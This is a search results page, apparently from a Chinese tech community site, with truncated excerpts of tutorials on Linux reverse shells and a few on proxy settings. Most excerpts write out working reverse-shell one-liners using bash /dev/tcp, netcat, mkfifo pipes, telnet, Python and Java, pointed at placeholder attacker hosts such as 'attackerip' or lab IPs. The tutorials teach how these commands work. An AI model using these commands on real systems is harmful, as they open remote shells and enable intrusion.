首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux反弹shell

bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...&1 2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹

10.4K00

Linux入侵 反弹shell

二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....使用 bash -i &> /dev/tcp/10.42.0.1 0<&1 同样能反弹一个可交互的shell。...三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。

6.2K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    nc 反弹shell ​| Linux 后门系列

    ---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...,如果没有指定用户名则不会尝试认证,代理认证功能目前只支持HTTP CONNECT代理 -p source_port 指定nc使用的源端口 -q seconds 在标准输入遇到 EOF 之后,等待指定的秒数之后再退出...--> https proxy -x proxy_address[:port] 要求 nc 使用指定代理地址和端口连接到目标,如果不指定端口,那么将使用代理协议的默认端口 socks 1080 / https...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...2>&1 不用说了,之前已经讲过了 nc -l 127.0.0.1 1234 > /tmp/f 本地监听 1234,并且将结果重定向到 /tmp/f 这里实现的是bind shell,我们希望的是反弹

    3.1K30

    linux下反弹shell的姿势

    通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。...下面就说说linux自带的程序来反弹shell的姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。...0x05 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p Telnet telnet客户端作为一个远程管理设备的软件,也可以作为反弹...attackerip 4444 | /bin/bash | telnet attackerip 4445 远程服务器监听tcp的4445端口 常见脚本 python python作为一个优秀的脚本语言通常默认安装在各大linux...tcp/10.0.0.1/2002;cat &5 >&5; done"] as String[]) p.waitFor() 其他工具 linux

    1.6K00

    WEB安全基础 - - -Linux反弹shell

    目录 一,Shell简介 正向shell(客户端想要获得服务端的shell) 反向shell (服务端想要获得客户端的shell)  二,Linux反弹shell 1.NC正向shell    2.NC...反向shell ​编辑 3.bash反弹shell  4.无e参数反弹shell  5.Base64编码绕过 ​编辑 6.Telnet反弹shell  7.OpenSSL反弹443端口,流量加密传输 一...getshell:获取到目标的命令执行权限 webshell:网站后门,通过web服务进行命令执行 反弹shell:将命令行的输入与输出转移到其他主机 正向shell(客户端想要获得服务端的shell...二,Linux反弹shell 实验环境 目标机器:Ubuntu、IP:10.1.1.200、ssh账号密码root/root 攻击机器:Kali、IP:10.1.1.100 1.NC正向shell.../dev/tcp/10.10.1.11/6666 传递的数据作为交互式shell的输入,命令执行后的结果输出到 /dev/tcp/10.10.1.11/6666 //     /dev/tcp/是Linux

    1.5K20

    Linux环境反弹shell原理与姿势

    shell,即攻击者在攻击主机上开启端口监听,随后让目标主机反向连接攻击者的服务器,从而规避防火墙、端口、权限等问题,本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹shell 基础知识 描述符类...文件描述符(File Descriptor,FD)是一个非负整数,用于标识进程打开的文件或其他输入/输出资源(例如:管道、网络套接字等),在Linux和Unix系统中文件描述符是实现文件操作的基本机制之一...回调,当事件发生时服务会向指定的URL发出请求 反向Shell:黑客可能通过利用反向Shell技术,从受害者的机器上反向连接回攻击者的机器以获取控制权 远程管理工具:某些远程访问工具会在被管理设备上运行代理程序...,该代理会定期尝试连接到管理服务器 常规反弹 在Linux中我们最常用的反弹shell手法就是通过Bash进行反弹shell,下面进行一个简单的演示: Step 1:在Attacker机器上执行 nc...shell回来: 文末小结 本篇文章我们主要介绍了Linux下如何反弹shell到我们的目标主机~

    11810

    Linux重定向及反弹shell详解

    这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01...文件描述符 Linux的文件描述符有以下三种 标准输入:0 标准输出:1 错误输出:2 对于文件描述符就先知道这些就可以了,具体的使用会在重定向中来说,重定向就是对文件描述符的操作 0x02 重定向...0x03 反弹shell 下面是很常见的一条反弹shell命令,我们就以这个为例来进行解释 bash -i >& /dev/tcp/ip/port 0>&1 解释 bash -i 表示创建一个交互式的...首先我们在本地开启监听,然后在Linux机器上输入下面的命令,即将指定字符发送到192.168.6.1的3333端口 ? ?

    1.3K10

    linux代理设置

    http代理 有些局域网环境上网需要使用代理上网,图形界面的很好解决就设置一下浏览器的代理就好了,但是Linux纯命令行的界面就需要手动配置了。      ...;   https_proxy:https协议使用安全代理地址;   ftp_proxy:ftp协议使用代理服务器地址;   user:代理使用的用户名;   password:代理使用用户名的密码;...常用linux程序配置代理服务器的方法: [ 通用代理服务器配置 ] 对于大多数Linux控制台程序,例如Debian或Ubuntu中的apt-get和aptitude命令、git命令、wget命令,这些程序都使用...ia32:printing-4.0-noarch   Distributor ID: RedHatEnterpriseServer   Description:    Red Hat Enterprise Linux...;">http://192.168.3.171:3128 export的效力仅及于该此登陆操作,非全局,详细内容可参考:linux环境变量 export命令详解    这样就可以让不能访问外部网络的内网机器通过可以访问外网的机器做为代理访问到外部网络

    9.1K10

    反弹Shell

    大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。...主机开启9090端口的tcp服务 B主机连接到A主机的9090的tcp服务 A主机通过tcp服务把命令发到B主机 B主机读取命令并且在bash中执行 B主机把执行结果发给A主机 Linux...文件描述符,Linux shell的三种标准的文件描述符 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2...check cat: check: 没有那个文件或目录 [root@wcy ~]# /dev/tcp/192.168.233.10/6699 就是/dev/tcp/ip/port, /dev/tcp/是Linux...(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" 成功反弹

    75130

    Linux代理配置

    系统全局HTTP代理 注意 这种方式只适合http代理 设置全局代理,需要编辑profile文件 vi /etc/profile 末尾添加以下代理配置,参考代理是否需要用户名密码 #无用户名密码...; https_proxy:https协议使用安全代理地址; ftp_proxy:ftp协议使用代理服务器地址; user:代理使用的用户名; password:代理使用用户名的密码; proxy.abc.com...:代理地址,可以是IP,也可以是域名; 8080:使用的端口; no_proxy:不使用代理的主机或IP。...google.com 80 转换Socks代理 系统代理只能设置HTTP代理,但是使用privoxy将socks5转换为http代理 安装privoxy yum install -y privoxy...://127.0.0.1:8118 export https_proxy=http://127.0.0.1:8118 注:8118是privoxy默认使用的端口 配置Socks5代理软件 Linux 有一个能够强迫任何软件通过

    3.5K50

    Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听...可以看到shell成功反弹到了kali上面,可以执行命令: ? 在解释这条反弹shell的命令原理之前,首先需要掌握几个点。...linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr...理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个...如果nc不支持-e参数的话,可以利用到linux中的管道符,首先在kali上开启监听: ?

    1.9K10
    领券